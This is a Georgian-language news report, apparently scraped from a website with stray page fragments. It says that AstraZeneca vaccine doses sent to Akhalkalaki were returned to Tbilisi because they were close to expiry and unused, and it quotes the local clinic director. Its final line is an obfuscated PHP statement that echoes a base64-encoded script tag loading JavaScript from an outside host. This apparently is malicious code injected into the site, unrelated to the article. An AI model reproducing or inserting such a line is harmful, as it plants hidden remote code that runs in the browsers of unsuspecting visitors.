celsiusi
ავერსი შნაიდერი
ახალქალაქში შეტანილი AstraZeneca-ს 30 ამპულიდან 29 უკან, თბილისში დააბრუნეს - ინფორმაციას "ჯეო ჰოსპიტალის" ახალქალაქის კლინიკის დირექტორი ადასტურებს.
 
მისივე განმარტებით, ვაქცინას ვადა გასდიოდა, ჯავშანი კი ამ დრომდე არავის აქვს გაკეთებული.
 
"300 დოზა იყო, მაგრამ ვადა ჰქონდა მაისამდე. ამის გამო 10 დოზა დავტოვე, დანარჩენი სამინისტროს დავუბრუნე, ცოდოა, რომ გაფუჭდეს. ჩემი თანამშრომლები თბილისში აპირებენ წასვლას და ​"ფაიზერის" ვაქცინის გაკეთებას. ვაქცინაცია ერთადერთი გამოსავალია, რომ პანდემია დამარცხდეს“ - აცხადებს ალექსანდრე თოროიანი.
 
აქვე გეტყვით, რომ სამცხე-ჯავახეთში ვაქცინაცია თავდაპირველად ახალციხის, ახალქალაქისა და ბორჯომის კლინიკებში უნდა ჩატარებულიყო. 15 და 18 მარტს ახალციხეში 20 მედპერსონალი, ბორჯომში კი ექვსი აიცრა. მეგი ბაქრაძის გარდაცვალების შემდეგ კი, რეგიონში არავინ აცრილა.
 
1304
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");